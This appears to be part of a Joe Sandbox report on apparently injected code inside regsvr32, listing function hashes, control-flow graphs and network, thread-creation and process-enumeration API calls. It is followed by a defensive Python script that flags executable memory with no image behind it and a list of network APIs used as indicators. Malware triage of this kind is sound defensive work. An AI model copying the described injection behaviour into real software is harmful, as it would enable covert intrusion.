• String ID: Cach$Find$Flus$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$p$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce
• API String ID: 808794760-1106743406
• Opcode ID: 96fce6a7bff5e5b76bf571e1cae8f3a184cbff359d7bfa11d59d9d5912008097
• Instruction ID: 26daa3500a64457429d98f0f14a8bb8ccf83af7103e22a9fa0b5e9a670f0721c
• Opcode Fuzzy Hash: 96fce6a7bff5e5b76bf571e1cae8f3a184cbff359d7bfa11d59d9d5912008097
• Instruction Fuzzy Hash: E372F631618B488FDB18EF18C8857BAB7E1FF94309F14862DE88AD7211DB34D546CB85
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 434 2ce8cac-2ce8d0d call 2cf144c 437 2ce8d15-2ce8d1a 434->437 438 2ce93b6-2ce93ba 437->438 439 2ce8d20-2ce8d25 437->439 440 2ce93bf-2ce93c4 438->440 441 2ce8d2b-2ce8d30 439->441 442 2ce9214-2ce93ac call 2cecc48 call 2cd39a8 call 2cef3f0 439->442 446 2ce946d-2ce947f 440->446 447 2ce93ca 440->447 443 2ce8d36-2ce8d3b 441->443 444 2ce9175-2ce9201 call 2cde020 441->444 442->438 448 2ce90d0-2ce9159 call 2cf182c 443->448 449 2ce8d41-2ce8d46 443->449 456 2ce9206-2ce920a 444->456 447->437 459 2ce915e-2ce9165 448->459 452 2ce93cf-2ce9468 call 2cdc77c 449->452 453 2ce8d4c-2ce8d51 449->453 452->446 453->440 457 2ce8d57-2ce8d85 453->457 456->442 461 2ce8d8b-2ce8d90 457->461 462 2ce90a3-2ce90b7 457->462 459->446 464 2ce916b-2ce9170 459->464 465 2ce8d92-2ce8d99 461->465 466 2ce8db1-2ce8db3 461->466 468 2ce90bc-2ce90cb 462->468 464->468 470 2ce8d9b-2ce8d9f 465->470 471 2ce8da7-2ce8dac 465->471 466->471 472 2ce8db5-2ce9005 call 2cecc48 call 2ce5dac call 2ce8cac 466->472 468->437 470->466 473 2ce8da1-2ce8da5 470->473 471->437 479 2ce900a-2ce909e call 2cef3f0 472->479 473->466 473->471 479->471
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_2cd1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 8I`%$;_|$V`p$s+C
                                                                                                                                                                                    • API String ID: 0-3694424346
                                                                                                                                                                                    • Opcode ID: 3c8b60d5bf308e10872c21dfdcba23dd6ebcd82dadb27c9a7f4eb8d53d6be293
                                                                                                                                                                                    • Instruction ID: 427c31c495477dffa7647cd344da9e379b7a74ab1a67f7b8a1dd0687edf8f9b2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c8b60d5bf308e10872c21dfdcba23dd6ebcd82dadb27c9a7f4eb8d53d6be293
                                                                                                                                                                                    • Instruction Fuzzy Hash: E322DC705087C88BC758DFA9C58A55FFBE2FBC4748F508A1DE4868B260D7B8D949CB42
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 563 2ce3438-2ce3486 564 2ce3488-2ce348d 563->564 565 2ce36e6-2ce378e call 2cd4dfc 564->565 566 2ce3493-2ce3498 564->566 574 2ce379a-2ce379e 565->574 575 2ce3790-2ce3795 565->575 568 2ce34ac-2ce3534 call 2cda8e0 566->568 569 2ce349a-2ce349f 566->569 576 2ce3539-2ce353e 568->576 570 2ce34a5-2ce34aa 569->570 571 2ce37a3-2ce37a8 569->571 570->564 571->564 577 2ce37ae-2ce37b1 571->577 574->571 578 2ce36d8-2ce36e1 575->578 579 2ce37b7-2ce386e call 2cda798 576->579 580 2ce3544-2ce3549 576->580 577->579 581 2ce3870-2ce387a 577->581 578->564 584 2ce387d-2ce3890 579->584 580->577 582 2ce354f-2ce3554 580->582 581->584 582->578 585 2ce355a-2ce35e6 call 2cd4dfc 582->585 585->577 589 2ce35ec-2ce36d2 call 2cf4a5c call 2cda798 585->589 589->577 589->578
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_2cd1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 6>$c^a$lJ,
                                                                                                                                                                                    • API String ID: 0-2820885608
                                                                                                                                                                                    • Opcode ID: 806fbeec97bab1d6521af437b1939402f8f7e3549c268b4ce014efa68613405d
                                                                                                                                                                                    • Instruction ID: 326b4d29a44b7bd1e887dd209331e2857e71ba4a0afe69e9469406ac0f1f562f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 806fbeec97bab1d6521af437b1939402f8f7e3549c268b4ce014efa68613405d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4ED117B190478C8BCF58CFA8C88A4ED7FF1FB88358F244219E846A7250D774E985CB95
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 644 2cec860-2cec8b1 call 2cf144c 647 2cec8b6-2cec8bb 644->647 648 2cecb79-2cecb89 call 2cd1de4 647->648 649 2cec8c1-2cec8c6 647->649 657 2cecb8b-2cecb90 648->657 658 2cecb95 648->658 651 2cec8cc-2cec8d1 649->651 652 2ceca64-2cecb5d call 2cdaa30 649->652 654 2cec8d7-2cec8d9 651->654 655 2cec991-2ceca5a call 2cf12fc 651->655 662 2cecb62-2cecb69 652->662 659 2cec8df-2cec8e4 654->659 660 2cecba7-2cecc27 call 2cdff40 654->660 667 2ceca5f Process32FirstW 655->667 657->647 665 2cecb97-2cecb9c 658->665 663 2cec8ea-2cec8ef 659->663 664 2cec982-2cec98c 659->664 669 2cecc2c-2cecc44 660->669 668 2cecb6f-2cecb74 662->668 662->669 663->665 670 2cec8f5-2cec97d call 2cdd604 663->670 664->647 665->669 671 2cecba2 665->671 667->652 668->647 670->647 671->647
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_2cd1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: =\$~W$'
                                                                                                                                                                                    • API String ID: 0-3124701200
                                                                                                                                                                                    • Opcode ID: 1c99fa3b55c2ac82a84a91b5d19b0469eb31213bec8731a85eed8c120310bcf7
                                                                                                                                                                                    • Instruction ID: 4a28a0306111a8353bad5a949df8a3fc8548b55f0dfa6e8ad4f82b391e76005d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c99fa3b55c2ac82a84a91b5d19b0469eb31213bec8731a85eed8c120310bcf7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 25A14E715197849FCBA9DF24C48959EBBF1FB84344F801A1EF8868B260D7B4DA44CF42
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32 ref: 02CDFAE4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_2cd1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InformationVolume
                                                                                                                                                                                    • String ID: $*=$b.
                                                                                                                                                                                    • API String ID: 2039140958-4176112928
                                                                                                                                                                                    • Opcode ID: 346976810df18c024b58b8b1e6b853f8ab62219822a63ae29cb5cc5a3c5dff76
                                                                                                                                                                                    • Instruction ID: 37936e4f0e81e9c1addbd6c3fd6c41ed7a3925d8ae128843df28c81d0f62051f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 346976810df18c024b58b8b1e6b853f8ab62219822a63ae29cb5cc5a3c5dff76
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F41397060C7848FD7A8DF18D0897ABBBE0FB98315F104A1EE88987355CB749888CB47
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 674 2cde0d4-2cde23c call 2cf144c call 2cd89d8 InternetConnectW
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_2cd1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ConnectInternet
                                                                                                                                                                                    • String ID: o
                                                                                                                                                                                    • API String ID: 3050416762-252678980
                                                                                                                                                                                    • Opcode ID: 112bcd67e9ebc57c78e66efcc13563654b4e3f0dda1229024f632da053e7203d
                                                                                                                                                                                    • Instruction ID: 471f7452546facfac55e1287953a0e33ee10436ca17b719e8d2c9ce7380ba8a7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 112bcd67e9ebc57c78e66efcc13563654b4e3f0dda1229024f632da053e7203d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4541027060C7848FD7A8DF19D48579BBBE0FB89305F404A2EE8CD87256DB349885CB86
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_2cd1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID: v/p
                                                                                                                                                                                    • API String ID: 823142352-3978593441
                                                                                                                                                                                    • Opcode ID: 68c780395f955e950d2ebcb50deffce3f0b9355b3905db6f66bde5ff0f0c67f6
                                                                                                                                                                                    • Instruction ID: 900500de23c23d9ea7ee33257ea150440c3f5b35153f36086a82e24a8482165f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 68c780395f955e950d2ebcb50deffce3f0b9355b3905db6f66bde5ff0f0c67f6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B31057050C7848FC7A4DF18D08479ABBE5FB98314F104A6EE88DD7262DB749885CB87
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_2cd1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
Similarity
• API ID: HttpOpenRequest
• String ID:
• API String ID: 1984915467-0
• Opcode ID: 54ac01d4c75d6e061093fcf435e0fad92b7802823d1446ad947ac7530fcd3a7e
• Instruction ID: 02de82d458aa6a92c50d98d680d13332d5f14e1cf7c033580b85a950564ef09e
• Opcode Fuzzy Hash: 54ac01d4c75d6e061093fcf435e0fad92b7802823d1446ad947ac7530fcd3a7e
• Instruction Fuzzy Hash: B0411A7051D7808BE7B8DF18D489B9AB7E0FB98305F104A5EE88D8B255CB749844CB86
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2cd1000_regsvr32.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 919e413507f5d37ff538dab85320da54a1bc9eedddd4ec7782e108e30ff8ee19
• Instruction ID: a4cbb3de8761c763351e934ffe2780fe80c91c9d843c1a57d3265e1437f29411
• Opcode Fuzzy Hash: 919e413507f5d37ff538dab85320da54a1bc9eedddd4ec7782e108e30ff8ee19
• Instruction Fuzzy Hash: C831097160CB848FDBB8DF18D08575AB7E1FB99314F20495EE88D8725ACB749848CB87
Uniqueness
Uniqueness Score: -1.00%
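The security-relevant point in the entries above is that the dumped region at 02CD1000 inside regsvr32 is marked "based on PE: false" (memory not backed by an image on disk) yet contains functions calling HttpOpenRequest and CreateThread, which is the classic shape of injected or unpacked code talking to a C2. The script below is an added example, not part of the Joe Sandbox report or its tooling: it decodes the dump file name shown in the Source File field into Windows memory attributes and applies that triage rule. The assumed field layout of the .sdmp name (process index, dump number, a counter whose meaning is unknown here, base address, then MEMORY_BASIC_INFORMATION Protect, State and Type values in hex) is inferred from the one name on this page; the constant values themselves are the documented winnt.h ones, and the set of "network" API names is this example's own choice.

```python
"""Decode a Joe Sandbox .sdmp dump name and flag unbacked executable memory.

Added example; the .sdmp field layout below is an assumption inferred from
the single file name in this report, not a documented Joe Sandbox format.
"""
import re
from dataclasses import dataclass

# Documented winnt.h values for MEMORY_BASIC_INFORMATION.Protect/State/Type.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE_BITS = 0xF0  # any PAGE_EXECUTE* value sets one of these bits

# Assumed layout (hypothetical, inferred from this page):
#   <proc index>.<dump no>.<counter>.<base addr>.<protect>.<state>.<type>.<extra>.sdmp
SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)

# Example's own list of APIs that indicate outbound network activity.
NETWORK_APIS = {
    "HttpOpenRequest", "HttpSendRequest", "InternetConnect", "InternetOpen",
    "WinHttpOpenRequest", "WinHttpSendRequest", "connect", "send", "WSASend",
}


@dataclass(frozen=True)
class DumpRegion:
    proc_index: int
    dump_no: int
    base: int
    protect: int
    state: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTABLE_BITS)

    @property
    def private(self) -> bool:
        return self.mem_type == 0x20000  # MEM_PRIVATE: not file- or image-backed


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split an .sdmp file name into its (assumed) fields; all values are hex."""
    m = SDMP_RE.match(name.rsplit("/", 1)[-1])
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name}")
    proc, dump, _counter, base, prot, state, mtype, _extra = m.groups()
    return DumpRegion(int(proc, 16), int(dump, 16), int(base, 16),
                      int(prot, 16), int(state, 16), int(mtype, 16))


def triage_region(region: DumpRegion, pe_backed: bool, apis) -> list:
    """Return the injection indicators that apply to a dumped region.

    The rule: committed, executable, private memory with no PE image behind
    it is suspicious on its own; network or thread-creation calls made from
    such a region raise the confidence further.
    """
    findings = []
    if region.state != 0x1000:           # only MEM_COMMIT regions hold code
        return findings
    unbacked = region.executable and region.private and not pe_backed
    if not unbacked:
        return findings
    findings.append("executable private memory not backed by a PE image")
    hits = sorted(NETWORK_APIS & set(apis))
    if hits:
        findings.append("network API called from unbacked region: " + ", ".join(hits))
    if "CreateThread" in apis:
        findings.append("thread creation from unbacked region")
    return findings


# Values taken from the entries above (the only real input here).
SOURCE_FILE = "00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp"
REGION = parse_sdmp_name(SOURCE_FILE)
APIS_IN_REGION = ("HttpOpenRequest", "CreateThread")

if __name__ == "__main__":
    print(f"process {REGION.proc_index} dump {REGION.dump_no} @ 0x{REGION.base:x}: "
          f"{REGION.protect_name} {MEM_STATE[REGION.state]} {MEM_TYPE[REGION.mem_type]}")
    for finding in triage_region(REGION, pe_backed=False, apis=APIS_IN_REGION):
        print("-", finding)
```

For the dump on this page the decode gives PAGE_EXECUTE_READ, MEM_COMMIT, MEM_PRIVATE at 0x2CD1000 in process 8 (regsvr32, matching the snapshot name hcaresult_8_2_2cd1000_regsvr32.jbxd), and all three indicators fire; the same region reported as image-backed, or an image-backed MEM_IMAGE section, produces no findings, which is the distinction a responder wants before carving the region out for further analysis.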